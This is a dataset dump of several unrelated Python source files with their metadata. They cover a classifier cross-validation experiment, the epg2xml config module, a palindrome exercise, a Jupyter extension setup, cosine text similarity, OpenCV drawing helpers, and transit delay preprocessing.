RepeatedKFold(n_splits=10,n_repeats=10)\n for train_index,test_index in rkf.split(X):\n x_train,x_test = X[train_index],X[test_index]\n y_train,y_test = y[train_index],y[test_index]\n clf.fit(x_train,y_train)\n pre_y = clf.predict_proba(x_test)[:,1]\n fpr,tpr,thresholds = roc_curve(y_test,pre_y)\n auc1[count] = auc(fpr,tpr)\n count += 1\n auc1 = np.nanmean(auc1)\n return auc1\n\n\n# In[10]:\n\n\nfrom sklearn import svm\nfrom sklearn import naive_bayes\nfrom sklearn.tree import DecisionTreeClassifier\ndef Model_Initialize():\n clf_svm = svm.SVC(gamma='auto',probability=True)\n clf_bayes = naive_bayes.GaussianNB()\n clf_tree = DecisionTreeClassifier()\n return clf_svm,clf_bayes,clf_tree\n\n\n# In[32]:\n\n\n\nimport os\nif __name__ == 
'__main__':\n    files = os.listdir('D:\\Code\\Data_Mining_Code\\ex3\\Data')\n    for file in files:\n        \n        Original_Data,m,n = Data_Load(file)\n        N,Y,k = compute_N_Y_k(Original_Data)\n        data_scaled_N,data_scaled_Y = compute_scale(Original_Data,m,N,Y)\n        NY_distance_samples_neighbor = Cal_Distance(data_scaled_N,data_scaled_Y,N,Y,k)\n        Feature_Sequence = Cal_Feature_Differential(Original_Data,NY_distance_samples_neighbor,m,n).astype(np.int32)\n        data_scaled_N_Y = np.concatenate((data_scaled_N,data_scaled_Y),axis=0)\n        data_scaled_N_Y = data_scaled_N_Y[data_scaled_N_Y[:,0].argsort()]\n        data = data_scaled_N_Y[:,Feature_Sequence[0,:]+1]\n        # map the N,Y labels to 0,1\n        lookupTable,label = np.unique(data_scaled_N_Y[:,n], return_inverse=True)\n        data = np.concatenate((data,label.reshape(-1,1)),axis=1)\n        if os.path.exists(file+'.txt'):\n            continue\n        else:\n            np.savetxt(file+'.txt',data)\n\n        if os.path.exists(file+'.csv'):\n            continue\n        data = np.loadtxt('D:\\Code\\Data_Mining_Code\\ex3\\\\txtdata\\\\'+str(file)+'.txt')\n        m,n = data.shape\n        print(file)\n        d = int(math.log(N+Y,2))\n        print(\"d: \"+ str(d))\n\n        clfs = Model_Initialize()\n        Feature_index = list(range(1,n+1))\n        roc_f1_columns = ['roc_auc_svm','roc_auc_bayes','roc_auc_tree'] \n        auc_Array = np.array([])\n        for i in range(n):\n            print(\"Feature 1 To \"+str(i+1))\n            for clf in clfs: \n                mean_auc = Train_Measure(data[:,0:i+1],data[:,-1],clf)\n                auc_Array= np.append(auc_Array,mean_auc)\n        auc_Array = auc_Array.reshape(-1,3)\n        df = pd.DataFrame(auc_Array,index=Feature_index,columns=roc_f1_columns)\n        print(file+' '+'_roc_auc: ')\n        print(df)\n        df.to_csv(file+'.csv')\n\n# In[ ]:\n\n\n\n\n","sub_path":"ex3/code/Exp_3.py","file_name":"Exp_3.py","file_ext":"py","file_size_in_byte":6439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"503692194","text":"import csv\n# w: write only; r: read only; a: append to the file\n# w+: read and write; r+: read and write; a+: read and append\n# wb+: write binary data\n# a file opened in w mode that already holds data is overwritten when new content is written\nRall=open(\"E:\\\\测试\\\\2.csv\",mode=\"r\")# create or open the text file\ndata1=Rall.read()# pass a character count in the parentheses; with no argument it reads the whole file\nprint(data1)\nRall.close()\n\n# Rfirst=open(\"E:\\\\测试\\\\1.txt\",mode=\"r\")\n# data2=Rfirst.readline()# read the first line\n# print(data2)\n#\n# Relement=open(\"E:\\\\测试\\\\1.txt\",mode=\"r\")\n# data3=Relement.readlines()# reads every line, returning a list with one element per line\n# print(data3)\n","sub_path":"对文本读写操作/读取写入数据/读.py","file_name":"读.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"515488217","text":"# -*- coding: utf-8 -*-\nimport argparse\nimport json\nimport logging\nimport os\nimport sys\nimport errno\nfrom copy import copy\n\nfrom epg2xml.utils import dump_json\nfrom epg2xml import __version__, __title__, __description__, __url__\n\nlogger = logging.getLogger(\"CONFIG\")\n\n\nclass Singleton(type):\n    _instances = {}\n\n    def __call__(cls, *args, **kwargs):\n        if cls not in cls._instances:\n            cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)\n\n        return cls._instances[cls]\n\n\nclass Config:\n    __metaclass__ = Singleton\n\n    base_config = {\n        'GLOBAL': {\n            'ENABLED': True,\n            'FETCH_LIMIT': 2,\n            'ID_FORMAT': '{ServiceId}.{Source.lower()}',\n            'ADD_REBROADCAST_TO_TITLE': False,\n            'ADD_EPNUM_TO_TITLE': True,\n            'ADD_DESCRIPTION': True,\n            'ADD_XMLTV_NS': False,\n            'GET_MORE_DETAILS': False,\n        },\n        'KT': {\n            'MY_CHANNELS': [],\n        },\n        'LG': {\n            'MY_CHANNELS': [],\n        },\n        'SK': {\n            'MY_CHANNELS': [],\n        },\n        'DAUM': {\n            'MY_CHANNELS': [],\n        },\n        'NAVER': {\n            'MY_CHANNELS': [],\n        },\n        
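# the provider entries below all share this shape: a per-source MY_CHANNELS list, with GLOBAL keys merged in as defaults by load_with_hidden()\n        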
'WAVVE': {\n 'MY_CHANNELS': [],\n },\n 'TVING': {\n 'MY_CHANNELS': [],\n },\n }\n\n base_settings = {\n 'config': {\n 'argv': '--config',\n 'env': 'EPG2XML_CONFIG',\n 'default': os.path.join(os.getcwd(), 'epg2xml.json')\n },\n 'logfile': {\n 'argv': '--logfile',\n 'env': 'EPG2XML_LOGFILE',\n 'default': None\n },\n 'loglevel': {\n 'argv': '--loglevel',\n 'env': 'EPG2XML_LOGLEVEL',\n 'default': 'INFO'\n },\n 'channelfile': {\n 'argv': '--channelfile',\n 'env': 'EPG2XML_CHANNELFILE',\n 'default': os.path.join(os.getcwd(), 'Channel.json')\n },\n 'xmlfile': {\n 'argv': '--xmlfile',\n 'env': 'EPG2XML_XMLFILE',\n 'default': None\n },\n 'xmlsock': {\n 'argv': '--xmlsock',\n 'env': 'EPG2XML_XMLSOCK',\n 'default': None\n },\n 'parallel': {\n 'argv': '--parallel',\n 'env': 'EPG2XML_PARALLEL',\n 'default': False\n },\n }\n\n def __init__(self):\n \"\"\"Initializes config\"\"\"\n # Args and settings\n self.args = self.parse_args()\n self.settings = self.get_settings()\n # Configs\n self.configs = None\n\n @property\n def default_config(self):\n \"\"\"reserved for adding extra fields\"\"\"\n cfg = copy(self.base_config)\n return cfg\n\n def __inner_upgrade(self, settings1, settings2, key=None, overwrite=False):\n sub_upgraded = False\n merged = copy(settings2)\n\n if isinstance(settings1, dict):\n for k, v in settings1.items():\n # missing k\n if k not in settings2:\n merged[k] = v\n sub_upgraded = True\n if not key:\n logger.info(\"Added %r config option: %s\", str(k), str(v))\n else:\n logger.info(\"Added %r to config option %r: %s\", str(k), str(key), str(v))\n continue\n\n # iterate children\n if isinstance(v, dict) or isinstance(v, list):\n merged[k], did_upgrade = self.__inner_upgrade(\n settings1[k], settings2[k], key=k, overwrite=overwrite\n )\n sub_upgraded = did_upgrade if did_upgrade else sub_upgraded\n elif settings1[k] != settings2[k] and overwrite:\n merged = settings1\n sub_upgraded = True\n elif isinstance(settings1, list) and key:\n for v in settings1:\n if v not in settings2:\n merged.append(v)\n sub_upgraded = True\n logger.info(\"Added to config option %r: %s\", str(key), str(v))\n continue\n\n return merged, sub_upgraded\n\n def upgrade_configs(self, currents):\n fields_env = {}\n\n # ENV gets priority: ENV > config.json\n for name, data in self.base_config.items():\n if name in os.environ:\n # Use JSON decoder to get same behaviour as config file\n fields_env[name] = json.JSONDecoder().decode(os.environ[name])\n logger.debug(\"setting from ENV --%s=%s\", name, fields_env[name])\n\n # Update in-memory config with environment settings\n currents.update(fields_env)\n\n # Do inner upgrade\n upgraded_configs, upgraded = self.__inner_upgrade(self.base_config, currents)\n return upgraded_configs, upgraded\n\n def load_with_hidden(self, cfg_old):\n cfg_new = copy(cfg_old)\n for p in cfg_new:\n # push items in GLOBAL as defaults\n for k, v in cfg_old['GLOBAL'].items():\n if k not in cfg_new[p]:\n cfg_new[p][k] = v\n del cfg_new['GLOBAL']\n self.configs = cfg_new\n\n def load(self):\n logger.debug(\"Loading config...\")\n if not os.path.exists(self.settings['config']):\n logger.info(\"No config file found. 
Creating a default one...\")\n self.save(self.default_config)\n\n try:\n with open(self.settings['config'], 'r', encoding='utf-8') as fp:\n cfg, upgraded = self.upgrade_configs(json.load(fp))\n\n # Save config if upgraded\n if upgraded:\n self.save(cfg)\n exit(0)\n\n self.load_with_hidden(cfg)\n except json.decoder.JSONDecodeError as e:\n logger.error(str(e))\n logger.error('Please check your config here: %s', self.settings['config'])\n exit(1)\n\n def save(self, cfg, exitOnSave=True):\n dump_json(self.settings['config'], cfg)\n if exitOnSave:\n logger.info(\n \"Your config was upgraded. You may check the changes here: %r\",\n self.settings['config']\n )\n\n if exitOnSave:\n exit(0)\n\n def get_settings(self):\n setts = {}\n for name, data in self.base_settings.items():\n # Argrument priority: cmd < environment < default\n try:\n value = None\n # Command line argument\n if self.args[name]:\n value = self.args[name]\n logger.debug(\"setting from ARG --%s=%s\", name, value)\n\n # Envirnoment variable\n elif data['env'] in os.environ:\n value = os.environ[data['env']]\n logger.debug(\"setting from ENV --%s=%s\" % (data['env'], value))\n\n # Default\n else:\n value = data['default']\n logger.debug(\"setting by default %s=%s\" % (data['argv'], value))\n\n setts[name] = value\n\n except Exception:\n logger.exception(\"Exception raised on setting value: %r\" % name)\n\n # checking existance of important files' dir\n for argname in ['config', 'logfile', 'channelfile']:\n filepath = setts[argname]\n if filepath is not None and not os.path.exists(os.path.dirname(filepath)):\n logger.error(FileNotFoundError(errno.ENOENT, os.strerror(errno.ENOENT), filepath))\n sys.exit(1)\n\n return setts\n\n # Parse command line arguments\n def parse_args(self):\n parser = argparse.ArgumentParser(\n prog=__title__,\n description=__description__,\n epilog=f'Online help: <{__url__}>',\n formatter_class=argparse.RawTextHelpFormatter\n )\n\n # Mode\n parser.add_argument(\n 'cmd',\n metavar='command',\n choices=('run', 'update_channels'),\n help=(\n '\"run\": XML 형식으로 출력\\n'\n '\"update_channels\": 채널 정보 업데이트'\n )\n )\n\n # Display version info\n parser.add_argument(\n '-v', '--version',\n action='version',\n version='{} v{}'.format(__title__, __version__)\n )\n\n # Config file\n parser.add_argument(\n self.base_settings['config']['argv'],\n nargs='?',\n const=None,\n help='config file path (default: %s)' % self.base_settings['config']['default']\n )\n\n # Log file\n parser.add_argument(\n self.base_settings['logfile']['argv'],\n nargs='?',\n const=None,\n help='log file path (default: %s)' % self.base_settings['logfile']['default']\n )\n\n # Log level\n parser.add_argument(\n self.base_settings['loglevel']['argv'],\n choices=('DEBUG', 'INFO', 'WARNING', 'ERROR'),\n help='loglevel (default: %s)' % self.base_settings['loglevel']['default']\n )\n\n # Channel file\n parser.add_argument(\n self.base_settings['channelfile']['argv'],\n nargs='?',\n const=None,\n help='channel file path (default: %s)' % self.base_settings['channelfile']['default']\n )\n\n # XML file\n parser.add_argument(\n self.base_settings['xmlfile']['argv'],\n nargs='?',\n const=None,\n help='write output to file if specified'\n )\n\n # XML socket\n parser.add_argument(\n self.base_settings['xmlsock']['argv'],\n nargs='?',\n const=None,\n help='send output to unix socket if specified'\n )\n\n # Run in Parallel\n parser.add_argument(\n self.base_settings['parallel']['argv'],\n action='store_true',\n help='run in parallel (experimental)'\n )\n\n # Print help 
by default if no arguments\n if len(sys.argv) == 1:\n parser.print_help()\n\n sys.exit(0)\n\n else:\n return vars(parser.parse_args())\n","sub_path":"epg2xml/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":10294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"528945075","text":"# Given a string, write a function to check if it is a permutation of\n# a palindrome. A palindrome is a word or phrase that is the same forwards and backwards. A\n# permutation is a rearrangement of letters. The palindrome does not need to be limited to just\n# dictionary words.\n\ndef is_palindrome_permutaion(s: str) -> bool:\n from collections import Counter\n\n word_count = Counter()\n odd_count = 0\n\n for letter in s.lower():\n if ord('a') <= ord(letter) <= ord('z'):\n word_count[letter] += 1\n \n for count in word_count.values():\n if count % 2 == 1:\n odd_count += 1\n\n return odd_count <= 1\n\nif __name__ == \"__main__\":\n test = 'ssws'\n print(is_palindrome_permutaion(test))\n\n","sub_path":"CTCI/Arrays_and_Strings/palindrom_permutaion.py","file_name":"palindrom_permutaion.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"228896016","text":"\"\"\"\nSetup module for the jupyterlab_swift proxy extension\n\"\"\"\nfrom setuptools import setup, find_packages\n\nsetup_args = dict(\n name = 'jupyterlab_swift',\n description = 'A Jupyter Notebook server extension which acts a proxy for a Swift API.',\n version = '0.2.1',\n author = 'University of Chicago',\n author_email = 'dev@chameleoncloud.org',\n url = 'https://www.chameleoncloud.org',\n license = 'BSD',\n platforms = 'Linux, Mac OS X, Windows',\n keywords = ['jupyter', 'jupyterlab', 'openstack', 'swift'],\n classifiers = [\n 'Intended Audience :: Developers',\n 'Intended Audience :: System Administrators',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: BSD License',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n ],\n packages = find_packages(),\n include_package_data = True,\n data_files = [\n ('etc/jupyter/jupyter_notebook_config.d', [\n 'jupyter-config/jupyter_notebook_config.d/jupyterlab_swift.json'\n ]),\n ],\n zip_safe = True,\n install_requires = [\n 'notebook'\n ]\n)\n\nif __name__ == '__main__':\n setup(**setup_args)\n","sub_path":"pypi_install_script/jupyterlab_swift-0.2.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"147544406","text":"\"\"\"\nThis Python File contains the function that takes in two strings and returns a metric that\nscores the texts similarities on a scale of 0 to 1. 
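The score is the cosine of the angle between the two word-count vectors, i.e. dot(a, b) / (|a| * |b|). 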
It uses the method of Cosine Similarity formula to\ndetermine the score.\n\"\"\"\n\nimport re\nimport math\n\n# List of words that we want to remove (stop words) from the inputted sentences\nSTOP_WORDS = [\"i\", \"me\", \"my\", \"myself\", \"we\", \"our\", \"ours\", \"ourselves\", \"you\",\n \"your\", \"yours\", \"yourself\", \"yourselves\", \"he\", \"him\", \"his\", \"himself\",\n \"she\", \"her\", \"hers\", \"herself\", \"it\", \"its\", \"itself\", \"they\", \"them\",\n \"their\", \"theirs\", \"themselves\", \"what\", \"which\", \"who\", \"whom\", \"this\",\n \"that\", \"these\", \"those\", \"am\", \"is\", \"are\", \"was\", \"were\", \"be\", \"been\",\n \"being\", \"have\", \"has\", \"had\", \"having\", \"do\", \"does\", \"did\", \"doing\", \"a\",\n \"an\", \"the\", \"and\", \"but\", \"if\", \"or\", \"because\", \"as\", \"until\", \"while\",\n \"of\", \"at\", \"by\", \"for\", \"with\", \"through\", \"during\", \"before\", \"after\",\n \"above\", \"below\", \"to\", \"from\", \"up\", \"down\", \"in\", \"out\", \"on\", \"off\",\n \"over\", \"under\", \"again\", \"further\", \"then\", \"once\", \"here\", \"there\",\n \"when\", \"where\", \"why\", \"how\", \"all\", \"any\", \"both\", \"each\", \"few\",\n \"more\", \"most\", \"other\", \"some\", \"such\", \"no\", \"nor\", \"not\", \"only\",\n \"own\", \"same\", \"so\", \"than\", \"too\", \"very\", \"can\", \"will\"]\n\n# List of contractions we want to map to their full words\nCONTRACTION_MAPPING = {\"you'll\": \"you will\", \"don't\": \"do not\", \"we'll\": \"we will\"}\n\n# Texts from the Project Requirements\nSAMPLE_TXT_ONE = \"The easiest way to earn points with Fetch Rewards is to just shop for the products you already \" \\\n \"love. If you have any participating brands on your receipt, you'll get points based on the cost of \" \\\n \"the products. You don't need to clip any coupons or scan individual barcodes. Just scan each \" \\\n \"grocery receipt after you shop and we'll find the savings for you. \"\n\nSAMPLE_TXT_TWO = \"The easiest way to earn points with Fetch Rewards is to just shop for the items you already buy. If \" \\\n \"you have any eligible brands on your receipt, you will get points based on the total cost of the \" \\\n \"products. You do not need to cut out any coupons or scan individual UPCs. Just scan your receipt \" \\\n \"after you check out and we will find the savings for you. \"\n\nSAMPLE_TXT_THREE = \"We are always looking for opportunities for you to earn more points, which is why we also give \" \\\n \"you a selection of Special Offers. These Special Offers are opportunities to earn bonus points on \" \\\n \"top of the regular points you earn every time you purchase a participating brand. No need to \" \\\n \"pre-select these offers, we'll give you the points whether or not you knew about the offer. We \" \\\n \"just think it is easier that way. 
\"\n\n\n# The first step is to clean the text\n\n# Remove all leading and trailing whitespaces - stray whitespace often appears when people copy and paste\ndef strip_document(txt):\n    \"\"\"\n    Returns string after removing leading and trailing spaces\n    :param txt: String to clean\n    :return: String\n    \"\"\"\n    txt = txt.strip()\n    return txt\n\n\n# Convert all the text to lowercase\ndef lower_case(txt):\n    \"\"\"\n    Returns string after making everything lowercase\n    :param txt: string\n    :return: string\n    \"\"\"\n    txt = txt.lower()\n    return txt\n\n\n# Replace all the Contractions in the Document\ndef replace_contraction(txt):\n    \"\"\"\n    Replaces contractions with their full words - see dictionary at top of file\n    :param txt: string\n    :return: string\n    \"\"\"\n    for contraction, full in CONTRACTION_MAPPING.items():\n        txt = txt.replace(contraction, full)\n    return txt\n\n# Remove all Stop words - they don't have significance for us\ndef remove_stop_words(list_words):\n    \"\"\"\n    Remove stop words from the list of words\n    :param list_words: list\n    :return: list\n    \"\"\"\n    result = [word for word in list_words if word not in STOP_WORDS]\n    return result\n\n\n# Only Keep alphanumeric characters - we are going to use regular expressions to do this\ndef keep_alphanum(txt):\n    \"\"\"\n    Removes all non-alphanumeric characters and returns the words of txt as a list\n    :param txt: string\n    :return: list\n    \"\"\"\n    pattern = re.compile(r\"\\w+\")\n    list_txt = pattern.findall(txt)\n    return list_txt\n\n\n# Count duplicate words and create dictionary\ndef word_count(list_words):\n    \"\"\"\n    Takes in a list and creates a dictionary of the word and the associated word count\n    :param list_words: list\n    :return: dictionary\n    \"\"\"\n    dict_word_count = {}\n    for word in list_words:\n        if word in dict_word_count:\n            dict_word_count[word] += 1\n        else:\n            dict_word_count[word] = 1\n    return dict_word_count\n\n\n# We need to get the Union of these two dictionaries\ndef create_txt_union(txt_one, txt_two):\n    \"\"\"\n    Creates a union of the dictionaries and returns a set of the words (unique)\n    :param txt_one: dictionary\n    :param txt_two: dictionary\n    :return: set\n    \"\"\"\n    txt_one_set = set(txt_one)\n    txt_two_set = set(txt_two)\n    txt_union = txt_one_set.union(txt_two_set)\n    return txt_union\n\n\n# Creating the vectors for these two dictionaries\ndef create_vectors(txt_one_dict, txt_two_dict, union):\n    \"\"\"\n    Takes in two dictionaries and a set to create a vector.\n    For each word, it stores the word's count if the word exists and 0 if it does not.\n    :param txt_one_dict: dictionary\n    :param txt_two_dict: dictionary\n    :param union: set\n    :return: list\n    \"\"\"\n    # Creating vector for first txt\n    vector_one = []\n    for word in union:\n        try:\n            vector_one.append(txt_one_dict[word])\n        except KeyError:\n            vector_one.append(0)\n\n    # Creating vector for second txt\n    vector_two = []\n    for word in union:\n        try:\n            vector_two.append(txt_two_dict[word])\n        except KeyError:\n            vector_two.append(0)\n    return vector_one, vector_two\n\n\ndef create_dot_product(vec_one, vec_two):\n    \"\"\"\n    Intakes two vectors and multiplies them together to get a product\n    Multiplies element 0 in list 1 with element 0 in list 2, element 1 in list 1 with element 1 in list 2\n    :param vec_one: list\n    :param vec_two: list\n    :return: int\n    \"\"\"\n    dot_product = sum(v1_element * v2_element for v1_element, v2_element in zip(vec_one, vec_two))\n    return dot_product\n\n\ndef create_divisor(vec_one, vec_two):\n    \"\"\"\n    Intakes two vectors and computes the magnitude of each - the divisors for the cosine formula\n    :param vec_one: list\n    :param 
vec_two: list\n :return: float\n \"\"\"\n vec_one_divisor = sum((item ** 2 for item in vec_one))\n vec_one_divisor = math.sqrt(vec_one_divisor)\n vec_two_divisor = sum((item ** 2 for item in vec_two))\n vec_two_divisor = math.sqrt(vec_two_divisor)\n return vec_one_divisor, vec_two_divisor\n\n\ndef determine_txt_similarity(txt_one, txt_two):\n \"\"\"\n This function takes in two string and apply all the functions above to\n result in a score from (0 to 1) of text similarity\n :param txt_one: string\n :param txt_two: string\n :return: float\n \"\"\"\n # Txt One Preparation (Cleaning and then getting the dict of word count)\n txt_one_clean = strip_document(txt_one)\n txt_one_clean = lower_case(txt_one_clean)\n txt_one_clean = replace_contraction(txt_one_clean)\n txt_one_clean = keep_alphanum(txt_one_clean)\n txt_one_clean = remove_stop_words(txt_one_clean)\n txt_one_count = word_count(txt_one_clean)\n\n # Txt Two Preparation (Cleaning and then getting the dict of word count)\n txt_two_clean = strip_document(txt_two)\n txt_two_clean = lower_case(txt_two_clean)\n txt_two_clean = replace_contraction(txt_two_clean)\n txt_two_clean = keep_alphanum(txt_two_clean)\n txt_two_clean = remove_stop_words(txt_two_clean)\n txt_two_count = word_count(txt_two_clean)\n\n # Getting the Union of the two texts (words)\n txt_union = create_txt_union(txt_one_clean, txt_two_clean)\n\n # Creating the vectors for our calculation\n vec_one, vec_two = create_vectors(txt_one_count, txt_two_count, txt_union)\n\n # Getting the Dot Product\n dot_product = create_dot_product(vec_one, vec_two)\n\n # Creating the two divisors\n txt_one_divisor, txt_two_divisor = create_divisor(vec_one, vec_two)\n\n # Calculating the result\n result = dot_product/(txt_one_divisor * txt_two_divisor)\n\n return result\n\n\n#test_result = round(determine_txt_similarity(SAMPLE_TXT_ONE, SAMPLE_TXT_THREE),2)\n#print(test_result)","sub_path":"App/text_similarity.py","file_name":"text_similarity.py","file_ext":"py","file_size_in_byte":8695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"639991818","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Input\nimport tensorflow.keras as k\nfrom display import display_comparison_batch\nfrom autoencoder_v2 import create_model\nfrom model_helper import ModelHelper\nimport utils\n\n\ndef create_full_model(autoencoder, shape):\n model = create_model(shape, trainable=False)\n helper = ModelHelper()\n helper.set_model(model)\n helper.load_model(autoencoder)\n helper.pop()\n helper.pop()\n helper.add(\n k.layers.Conv3D(\n filters=64,\n kernel_size=(5, 5, 5),\n kernel_regularizer=k.regularizers.l2(),\n activation=\"relu\"\n )\n )\n helper.add(k.layers.Dropout(0.5))\n helper.add(\n k.layers.AveragePooling3D(\n (2, 2, 2),\n 2\n )\n )\n helper.add(\n k.layers.Conv3D(\n filters=32,\n kernel_size=(5, 5, 5),\n kernel_regularizer=k.regularizers.l2(),\n activation=\"relu\"\n )\n )\n helper.add(k.layers.Dropout(0.5))\n helper.add(\n k.layers.AveragePooling3D(\n (2, 2, 2),\n 2\n )\n )\n helper.add(k.layers.Flatten())\n helper.add(\n k.layers.Dense(\n units=500,\n activation=\"tanh\"\n )\n )\n helper.add(k.layers.Dropout(0.5))\n helper.add(k.layers.Dense(units=3))\n\n model = helper.model\n return model\n\n\nif __name__ == \"__main__\":\n autoencoder_loc = \"1554700196.69537-autoencoder\"\n shape = np.expand_dims(\n np.load(\n 
\"/home/matthew-lee/Data/ADNI/clean/batches/test_0_x.npy\"\n ),\n axis=4\n ).shape[1:]\n\n model = create_full_model(autoencoder_loc, shape)\n model.summary()\n\n\n #class_weights = np.load(\n # \"/home/matthew-lee/Data/ADNI/clean/train_weightings.npy\"\n #)\n\n\n\n batch_loc = \"/home/matthew-lee/Data/ADNI/clean/batches/\"\n train_gen = utils.batch_generator(batch_loc, \"train\")\n model.compile(\n optimizer=tf.train.AdamOptimizer(0.00002),\n loss=\"categorical_crossentropy\",\n metrics=['accuracy']\n )\n\n class_weights = {\n 0: 0.075,\n 1: 0.025,\n 2: 0.9\n }\n\n model.fit(\n train_gen,\n epochs=20,\n steps_per_epoch=300,\n workers=1,\n use_multiprocessing=False,\n class_weight=class_weights\n )\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"535185691","text":"# draw overlay on an existing image using opencv\n\nimport cv2\nimport numpy as np\n\n\ndef draw_pts(img: np.ndarray, pts: np.ndarray, data_format='NHWC') -> np.ndarray:\n \"\"\"\n draw a sequence of points onto image\n :param img: raw image\n :param pts: A 3-D tensor, typical shape (batch_size, num_points, 2)\n :return:\n \"\"\"\n assert type(img) == np.ndarray\n assert img.ndim == 3\n try:\n assert data_format == 'NHWC'\n except AssertionError:\n print('data_format', data_format, 'is not implemented')\n for i in range(pts.shape[0]):\n img[i] = draw_pts_kernel(img[i], pts[i])\n return img\n\n\ndef draw_pts_kernel(img: np.ndarray, pts) -> np.ndarray:\n # pts: array-like\n for i in range(pts.shape[0]):\n cv2.circle(img, tuple(pts[i].astype(int)), 1, (0, 255, 0), 1)\n return img\n\n\ndef draw_bbx(img: np.ndarray, bbx: np.ndarray, data_format='NHWC') -> np.ndarray:\n assert type(img) == np.ndarray\n assert img.ndim == 3\n try:\n assert data_format == 'NHWC'\n except AssertionError:\n print('data_format', data_format, 'is not implemented')\n for i in range(bbx.shape[0]):\n img[i]= draw_bbx_kernel(img[i], bbx[i])\n return img\n\n\ndef draw_bbx_kernel(img: np.ndarray, bbx: np.ndarray) -> np.ndarray:\n \"\"\"\n\n :param img:\n :param bbx: A 1-D tensor with 4 elements, (x_min, y_min, x_max, y_max)\n :return:\n \"\"\"\n assert bbx.dtype == int\n assert bbx.ndim == 1\n assert bbx.shape[0] == 4\n img = cv2.rectangle(img, (bbx[0], bbx[1]), (bbx[2], bbx[3]), (0, 255, 0), 2)\n return img\n","sub_path":"draw_overlay.py","file_name":"draw_overlay.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"291426294","text":"import numpy as np\nimport pandas as pd\nimport pickle\n\n\"\"\"\nThis file preprocesses data from the dataframe\nAll the parameters are obtained from data used for training, thus every preprocessing is done \nusing the training data parameters\n\nThe preprocessor will not process the data unless the data provided feature columns are as per the requirement\n\"\"\"\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\ndef clean_delay(df):\n df = df[df['Min Delay'].notna()]\n return df\n\ndef check_route(x):\n # This function checks for valid routes only\n # Valid routes are identified from the website, only routes where the streetcar are working\n\n # load the valid list of TTC Streetcar routes\n valid_routes = [501, 502, 503, 504, 505, 506, 509, 510, 511, 512, 301, 304, 306, 310]\n\n if x in valid_routes:\n return x\n else:\n return \"bad route\"\n\n# This function cleans the data based on 
valid routes\ndef clean_route(df):\n # This function takes dataframe as input\n # cleans the route column based on the validity of the route of street car\n # returns the cleaned dataframe\n df['Route'] = df['Route'].apply(lambda x:check_route(x))\n df = df[df.Route != \"bad route\"]\n df['Route'] = df['Route'].astype('int64')\n return df\n\n# This function drops the Location column\ndef drop_location(df):\n df = df.drop([\"Location\"], axis=1)\n return df\n\ndef create_date_time_column(df):\n # This function takes dataframe, then merges the date and time\n # Then convert that column into datetime datatype\n # Such that it can be further used in time series easily\n try:\n new = pd.to_datetime(df[\"Report Date\"] + \" \"+ df[\"Time\"], utc=True)\n df[\"Date Time\"] = new\n df = df.drop([\"Report Date\", \"Time\"], axis=1)\n return df\n except:\n return df\n\n# This function divides a day into different period\ndef day_divider(hour):\n if hour > 5 and hour < 12:\n return \"morning\"\n elif hour >= 12 and hour < 17:\n return \"afternoon\"\n elif hour >= 17 and hour < 21:\n return \"evening\"\n else:\n return \"night\"\n\n\nmin_gap_scaler_data = pickle.load(open(\"../Models/min_gap_scaler.pkl\", 'rb'))\nmin_gap_train_mean = min_gap_scaler_data[\"mean\"]\nmin_gap_train_std = min_gap_scaler_data[\"std\"]\n\ndef clean_gap(df):\n # This function will help to clean the Min Gap column feature with training data Min Gap mean value\n df[\"Min Gap\"] = df[\"Min Gap\"].fillna(min_gap_train_mean)\n return df\n\n# These function help to filter the Direction values and clean them\n\ndef check_direction (x):\n valid_directions = ['eb', 'wb', 'nb', 'sb', 'bw']\n if x in valid_directions:\n return(x)\n else:\n return(\"bad direction\")\n\ndef direction_cleanup(df):\n df['Direction'] = df['Direction'].str.lower()\n df['Direction'] = df['Direction'].str.replace('/','')\n df['Direction'] = df['Direction'].replace({'eastbound':'eb','westbound':'wb','southbound':'sb','northbound':'nb'})\n df['Direction'] = df['Direction'].apply(lambda x:check_direction(x))\n return(df)\n\ndef complete_cleaner(df):\n df = clean_delay(df) # drops the nan Min delay rows\n df = clean_route(df) # cleans the unwanted route from the dataset\n df = drop_location(df) # drops the location column from the dataset\n df = create_date_time_column(df) # creates Date Time column in the dataset\n df[\"Part of Day\"] = df.apply(lambda x: day_divider(x[\"Date Time\"].hour),axis=1) # Creates Part of Day column in the dataset\n df = clean_gap(df) # cleans gap based on the mean of gap values\n df = direction_cleanup(df) # cleans the direction column to 5 directions(eb,wb,nb,sb,bw)\n df = df[df[\"Direction\"] != \"bad direction\"]\n df.reset_index(inplace=True, drop=True)\n df.drop(['Date Time'], axis=1, inplace=True)\n return df\n\nday_enc = pickle.load(open(\"../Models/day_encoder.pkl\", 'rb'))\nroute_enc = pickle.load(open(\"../Models/route_encoder.pkl\", 'rb'))\ndir_enc = pickle.load(open(\"../Models/direction_encoder.pkl\", 'rb'))\npart_enc = pickle.load(open(\"../Models/part_of_day_encoder.pkl\", 'rb'))\n\ndef one_hot_encoder(df):\n # This function does one hot encoding of the day, route, direction, and part of day columns\n # The one hot encoder object for different features are created using training data\n # The same objects will be used for test data encoding\n df[day_enc.categories_[0]] = 